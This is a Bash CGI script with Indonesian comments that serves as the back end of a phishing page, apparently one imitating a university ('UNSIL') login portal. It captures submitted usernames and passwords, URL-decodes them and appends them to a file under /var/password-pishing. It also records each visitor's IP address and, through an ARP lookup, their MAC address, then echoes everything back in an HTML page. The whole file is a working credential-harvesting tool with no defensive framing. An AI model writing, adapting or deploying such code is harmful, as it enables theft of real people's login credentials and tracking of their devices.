#!/usr/bin/env bash
# v0.3

echo "Content-Type: text/html"
echo ""

# Nama folder penyimpanan
FOLDER_PASS="/var/password-pishing"

# Buat folder jika belum ada
mkdir -p "$FOLDER_PASS"

# Lokasi file penyimpanan
FILE_SAVE="$FOLDER_PASS/user-password.txt"

# Ambil seluruh body POST
DATA=$(cat)

# ---- Ambil username ----
USERNAME=$(echo "$DATA" | sed -n 's/.*username=\([^&]*\).*/\1/p')
USERNAME=${USERNAME//+/ }
USERNAME=$(printf '%b' "${USERNAME//%/\\x}")

# ---- Ambil password ----
PASSWORD=$(echo "$DATA" | sed -n 's/.*password=\([^&]*\).*/\1/p')
PASSWORD=${PASSWORD//+/ }
PASSWORD=$(printf '%b' "${PASSWORD//%/\\x}")

# ---- Format penyimpanan ----
GABUNG="USER=$USERNAME PASS=$PASSWORD"

# Simpan ke file dengan aman (tanpa masalah sudo)
echo "$GABUNG" | sudo tee -a "$FILE_SAVE" > /dev/null

# ===========================
# ===========================
FILE_IP_MAC="$FOLDER_PASS/ip-mac.txt"

# ===========================
# Ambil IP dari variabel CGI
USER_IP="$REMOTE_ADDR"

# Ambil MAC Address (hanya bisa jika client satu jaringan LAN)
USER_MAC=$(arp -an | grep "$USER_IP" | awk '{print $4}')
USER_MAC=${USER_MAC^^}   # agar huruf besar semua

# ---- Format penyimpanan ----
IP_MAC="IP=$USER_IP MAC=$USER_MAC"

# Simpan ke file dengan aman (tanpa masalah sudo)
echo "$IP_MAC" | sudo tee -a "$FILE_IP_MAC" > /dev/null

# Delay sebelum menampilkan halaman
sleep 2.5

# OUTPUT HTML PERSIS SEPERTI HALAMAN UNSIL

cat <<EOF
<!DOCTYPE html>
<html>
<head><meta charset="UTF-8"><title>Data Tersimpan</title></head>
<body>
<h2>Data telah disimpan.</h2>
<p>IP: $USER_IP</p>
<p>MAC: $USER_MAC</p>
<p>Username: $USERNAME</p>
<p>Password: $PASSWORD</p>
</body>
</html>
EOF
